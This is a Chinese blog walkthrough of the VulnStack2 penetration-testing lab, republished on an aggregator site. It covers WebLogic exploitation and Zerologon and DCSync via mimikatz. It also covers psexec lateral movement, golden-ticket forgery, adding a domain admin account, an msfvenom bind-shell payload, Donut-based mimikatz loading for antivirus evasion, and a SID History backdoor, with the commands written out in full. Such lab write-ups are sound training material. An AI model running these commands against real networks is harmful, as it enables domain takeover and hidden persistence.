VulnStack2-主机不出网-黄金票据-SID History

news2024/11/14 12:15:36

网络结构

kali192.168.20.145
DC10.10.10.10
PC192.168.20.201/10.10.10.201
WEB192.168.20.80/10.10.10.80

WEB登录时,切到V1.3快照

且不登录默认用户

image-20240821175743026

开启weblogic服务

image-20240821194545822

漏洞利用

访问Weblogic默认的console路由http://192.168.20.80:7001/console

image-20240821194943684

直接用工具打一下

image-20240821195428858

拿到shell之后就可以在CS上线了

image-20240821202252633

操作会被web服务器上的360拦截可以手动关一下。。

内网渗透

可以看到是有个de1ay.com的域的,我们最终要拿到域管的权限

image-20240821202727862

zerologon一键秒域控

可以在CS中用mimikatz

lsadump::zerologon /target:dc.de1ay.com /account:dc$     #Poc
lsadump::zerologon /target:dc.de1ay.com /account:dc$ /exploit  #Exploit
lsadump::dcsync /domain:de1ay.com /dc:DC /user:administrator /authuser:dc$ /authdomain:de1ay /authpassword:"" /authntlm #获取域管administrator的hash
lsadump::postzerologon /target:dc.de1ay.com /account:dc$ #通过域管cmd,恢复域控机器账户密码

其中dc可以通过猜测,ping一下dc

image-20240821203851237

也可以shell net time

image-20240821212913431

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$漏洞存在

image-20240821204028015

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$ /exploit利用漏洞将域控机器账户密码置为空

image-20240821204349540

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC /user:administrator /authuser:dc$ /authdomain:de1ay /authpassword:"" /authntlm登录到域控机器账户并且获取域管密码的hash值

image-20240821204729686

最后是恢复域控机器账户密码,我们现在的权限会报ERROR,所以先放一下。

先ps_exec拿域控,通过之前的ping我们可以知道域控的IP 10.10.10.10

直接横向会报错,需要管理员权限

image-20240821205321857

所以现在先把WEB这台机器提升权限,用插件提权

image-20240821210006930

之后进行横向

image-20240821210057899

域控机器成功上线

image-20240821210121079

之后通过mimikatz抓明文可以看到,这台机器DC$被我们置空的密码

image-20240821211302198

现在就可以恢复域控机器账户的密码了 lsadump::postzerologon /target:dc.de1ay.com /account:dc$

可以看到这个脚本是把密码改为Waza1234

image-20240821211525917

之后看下域中主机shell net group "domain computers" /domain

image-20240821212008832

通过ping pc拿到它的IP(net view不能用),拿到IP 10.10.10.201

image-20240821212127846

之后ps_exec拿PC的权限,成功上线

image-20240821212323184

权限维持

黄金票据

黄金票据能我们在拥有普通域用户权限和KRBTGT账号(负责加密和签名 Kerberos 票据的账户)的哈希的情况下,获取域管理员权限。我们上面已经得到域控的 system权限了,可以使用黄金票据做权限维持,当失去域控system权限后,再通过域内其他任意主机伪造黄金票据来重新获取system权限。

1.从AS得到票据授权票据(TGT)(krbtgt hash加密) 每个会话进行一次

2.以TGT为凭证,通过TGS服务器的认证,获得服务授权票据SGT 对每个不同的服务请求一次

3.客户/服务器交换信息以获得服务 每次服务时

黄金票据就是通过获得的krbtgt Hash自己伪造一个TGT票据,这样就不需要通过AS认证而可以自己伪造任何一个域用户。

下面看我们需要获取的信息

首先域控的System通过hashdump获取KRBTGT的哈希

image-20240821220504178

通过明文的抓取也可以拿到域的SID(去掉后面部分)

image-20240821221041567

之后就可以伪造黄金票据了,我们选择PC这台10.10.10.201

image-20240822152400066

伪造成功

之后远程访问下域控DC的C盘目录shell dir \\dc\c$

image-20240822152330963

看下kerberos票证

image-20240822152526019

之后可以添加域管账户

shell net user pass 1234qwer! /add /domain
shell net group "domain admins" pass /add /domain
shell net group "domain admins" /domain

image-20240822152858972

SID History

在Windows中,每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。
如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz,可以将SID History属性添加到域中任意用户的SID History属性中。在实战中,如果获得了域管理员权限,则可以将SID History作为实现持久化的方法。

下面演示用mimikatz添加SID History后门的操作

首先在域控机器上创建一个普通用户shell net user yezzz 1234qwer! /add /domain

image-20240822163356745

之后联动msf使用msf的mimikatz

msf上线不出网主机

这里有遇见个问题,因为域控不出网,不能直接弹shell到msf。所以先上线WEB服务器,并添加路由

run autoroute -s 10.10.10.0/24

这样我们就能通过WEB的session去访问10.10.10.10

image-20240822182605138

之后我们生成msf的payload,注意LHOST是0.0.0.0或者127.0.0.1(因为要进行正向连接,需要10.10.10.10开启4444端口的监听)

用CS将payload上传到10.10.10.10主机

msfvenom -p windows/x64/meterpreter/bind_tcp Lhost=0.0.0.0 Lport=4444 -f exe -a x64 > 44444.exe

之后用handler模块捕获4444的连接

image-20240822201050399

在10.10.10.10运行exe

image-20240822201136469

成功在msf上线

image-20240822201159738

SID History后门
# 查看用户的 SID History 属性
Get-ADUser yezzz -Properties sidhistory
Get-ADUser Administrator -Properties sidhistory

查看我们创建的用户yezzz和域管的SID

image-20240822202756572

之后用shellcode_inject模块启动mimikatz

用的是Donut执行mimikatz,参考

minikatz免杀之msf加载bin文件 - G0mini - 博客园 (cnblogs.com)

Mimikatz的18种免杀姿势及防御策略(上) (qq.com)

Releases · gentilkiwi/mimikatz (github.com)

TheWover/donut: Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters (github.com)

前面我用成x86的payload了,在这儿报错,修改过程就不写了

use use post/windows/manage/shellcode_inject
set session 5
set shellcode /home/kali/mimi64.bin
set ChANNELIZED true 
set InTERACTIVE true 

image-20240822212227731

下面通过mimikatz修改SID

# 将高权限的 SID History 属性注入
privilege::debug
# 注入SID之前需要使用以下命令修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性;
# mimikatz在2.1版本后,将 misc:addsid 模块添加到了 sid:add 模块下。
sid::patch
sid::add /sam:yezzz /new:administrator

# 清除恶意用户的 SID History 属性
sid::clear /sam:yezzz

image-20240822213106296

最后用powershell看下修改后的恶意用户yezzz的SID

image-20240822213356065

可以看到,yezzz用户的SID History和administrator域管理员的SID相同。yezzz用户便拥有了administrator域管理员的权限。

参考文章:

vulnstack2靶机笔记-CSDN博客

网络安全/域渗透]内网安全入门靶场 vulnstack1攻略_哔哩哔哩_bilibili

权限维持之黄金白银票据 | Gta1ta’s Blog (myblog.ac.cn)

权限维持之:SID History 域控权限维持 - f_carey - 博客园 (cnblogs.com)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2064299.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

深信服研发面试经验分享

吉祥知识星球http://mp.weixin.qq.com/s?__bizMzkwNjY1Mzc0Nw&mid2247485367&idx1&sn837891059c360ad60db7e9ac980a3321&chksmc0e47eebf793f7fdb8fcd7eed8ce29160cf79ba303b59858ba3a6660c6dac536774afb2a6330#rd 《网安面试指南》http://mp.weixin.qq.com/s?…

新手友好:易于上手的10款项目管理工具推荐

国内外主流的 10 款轻量级项目管理软件对比:PingCode、Worktile、Coding、致远OA、Gitee、Wrike、ClickUp、Notion、Airtable、Basecamp。 在快节奏的工作环境中,有效的项目管理是成功的关键,尤其是对于资源有限的小型团队和初创公司而言。轻…

golang实现一个简单的rpc框架

前言 RPC在分布式系统中经常使用,这里写一个简单的demo实践一下。 code 先生成 go.mod 文件 go mod init rpc-try01定义方法 package model// Args 是 RPC 方法的参数结构体 type Args struct {A, B int }// Arith 定义了一个简单的算术服务 type Arith struct{…

解锁 Vue 3 Teleport 的魔力

偶然遇到一个场景&#xff0c;在项目开发中蒙层是很常见的一个组件&#xff0c;我们期望它会在 body 下显示&#xff0c;但有时候代码逻辑结构很合理&#xff0c;组件结构不是很合理&#xff0c;也就是说蒙层组件不在 body 下&#xff0c;比如说&#xff1a; 蒙层组件 <te…

初识网络--网络基础概念

目录 1 网络的发展 2 协议 ​编辑 3 网络传输的流程 局域网 跨网络通信 1 网络的发展 计算机是被人设计出来&#xff0c;为人提供计算服务的&#xff0c;而人是需要协作的&#xff0c;那么就注定计算机之间也必须要协作&#xff0c;计算机之间的协作就是靠互通数据来完成…

MySQL的源码安装

目录 1 编译前的准备 1.1 安装cmake 1.2 安装gcc 2 源码编译安装 2.1 使用cmake检查环境并指定路径 2.2 使用 make 进行源码编译 2.3 使用 make install 安装MySQL 3 MySQL源码安装环境配置 3.1 创建mysql 用户 3.2 编辑my.cnf 文件 3.3 conkconfig 创建开机自启服务 3.4 配置…

这 2 个 GitHub 项目,YYDS!

01 &#x1f9e0; 构建你的第二大脑&#xff1a;SuperMemory 在这个信息爆炸的时代&#xff0c;我们每天都在互联网上浏览和保存大量的信息&#xff0c;但往往这些宝贵的数据就像被扔进了黑洞&#xff0c;再也没有被回顾和利用。 SuperMemory 开源项目应运而生&#xff0c;旨在…

OLED(hal库)、OLED取模

目录 OLED&#xff08;hal库&#xff09; IIC通讯协议 软件IIC ​编辑 硬件IIC 移植OLED代码 代码测试 ​编辑 测试 这是我改好滴文件 OLED取模 软件 ​编辑文字 图片 OLED&#xff08;hal库&#xff09; IIC通讯协议 软件IIC 软件I2C&#xff08;或IIC&…

:class的用法及应用

参考小满视频 在同一个标签中&#xff0c;class只能有一个&#xff0c;:class也只能有一个 :class的用法 1. :class “非响应式的变量”&#xff08;一般不使用&#xff0c;和写死了一样&#xff09; const a "style1" <span :class"a"></spa…

JSONP实现跨域访问

JSONP实现跨域访问 课程目标 1、理解JSONP跨域访问的解决方案和实现原理 2、能够利用JavaScript后台和JQuery实现跨域处理 3、理解JavaScript后台代码回调的工作机制&#xff0c;并实现代码回调 4、综合上述&#xff0c;利用JSONP实现跨域访问 一、生成JSON响应 1、生成…

Nginx--监控

前言&#xff1a;本博客仅作记录学习使用&#xff0c;部分图片出自网络&#xff0c;如有侵犯您的权益&#xff0c;请联系删除 一、Nginx的基础监控 进程监控 端口监控 注意&#xff1a; 这两个是必须要加在zabbix监控&#xff0c;加触发器有问题及时告警。 nginx 提供了ngx…

8-9月强化速成|30天带刷《严选题》《660》

如果你的目标是90-100分&#xff0c;肯定是够了&#xff0c;但是像下面这样微调一下更好 你的基础阶段做的是辅导讲义上的题目&#xff0c;那么你的基础阶段的题量肯定是够了。 但是强化阶段如果只做660题和严选题&#xff0c;这个题量还有有一些薄弱的&#xff0c;建议可以把…

在线BLOG网

TOC springboot0785在线BLOG网 第1章 绪论 1.1课题背景 计算机的普及和互联网时代的到来使信息的发布和传播更加方便快捷。人们可以通过计算机上的浏览器访问多个应用系统&#xff0c;从中获取一些可以满足用户生活需求的管理系统。网站系统有时更像是一个大型“展示平台”…

【MySQL】半同步模式

1 半同步模式原理 1. 用户线程写入完成后 master 中的 dump 会把日志推送到 slave 端 2.slave 中的 io 线程接收后保存到 relaylog 中继日志 3. 保存完成后 slave 向 master 端返回 ack 4. 在未接受到 slave 的 ack 时 master 端时不做提交的&#xff0c;一直处于等待当收到…

Linux离线安装fontconfig

Linux离线下载yum包&#xff0c;安装字体库 一、下载安装包 以CentOS Linux release 7.9.2009下载fontconfig的rpm包的为例 http://mirror.centos.org/centos/7/按提示跳转历史库 找到对应版本的centos https://vault.centos.org/7.9.2009/os/x86_64/Packages/在Packages目…

5个免费的文章生成器,为你在线生成高质量原创文章

在ai技术发展的今天&#xff0c;我们面对文章创作再也不用感到苦恼&#xff0c;无论是没有创作灵感&#xff0c;还是不擅长写作&#xff0c;只要有了文章生成器&#xff0c;那么它就能帮助我们轻松完成任何类型的文章创作。文章生成器虽然很强大&#xff0c;但是市面上众多的文…

服务器备份

服务器备份 一、方案 FreeFileSync freeSSHd Windows任务计划程序 FreeFileSync&#xff1a;设置文件备份方案&#xff08;双向同步、镜像同步、更新同步、自定义同步&#xff09;&#xff0c;适用于本地的文件同步之外&#xff0c;还支持 Google Driver、SFTP 和 FTP 三种…

【Docker】安装Docker环境遇到的坑(VirtualBox)

利用vagrant工具在VirtualBox安装CentOS7环境后&#xff0c;安装Docker环境遇到的坑 前期准备工作 1、卸载原有环境 sudo yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logrotate \docker-logrotate \docker-engi…

10 Java数据结构:包装类、数组(Array工具类)、ArrayList

文章目录 前言一、包装类1、Integer&#xff08;1&#xff09;基本用法&#xff08;2&#xff09;JDK5前的包装类用法&#xff08;了解即可&#xff0c;能更好帮助我们理解下面的自动装箱和自动拆箱机制&#xff09;&#xff08;3&#xff09;自动装箱与自动拆箱机制 --- 导致&…

bbr 收敛动力学背后的数学原理

我进一步把 bbr 模型简化为更一般的形式。设 x 为 bbr 流的 estimated bw&#xff0c;wₓ 为 bbr 流的 inflight&#xff0c;C 为瓶颈带宽&#xff0c;R 为传播时延&#xff0c;R_s 为总时延&#xff0c;pacing_rate 增益为 g&#xff1a; I ( t ) t o t a l _ i n f l i g h …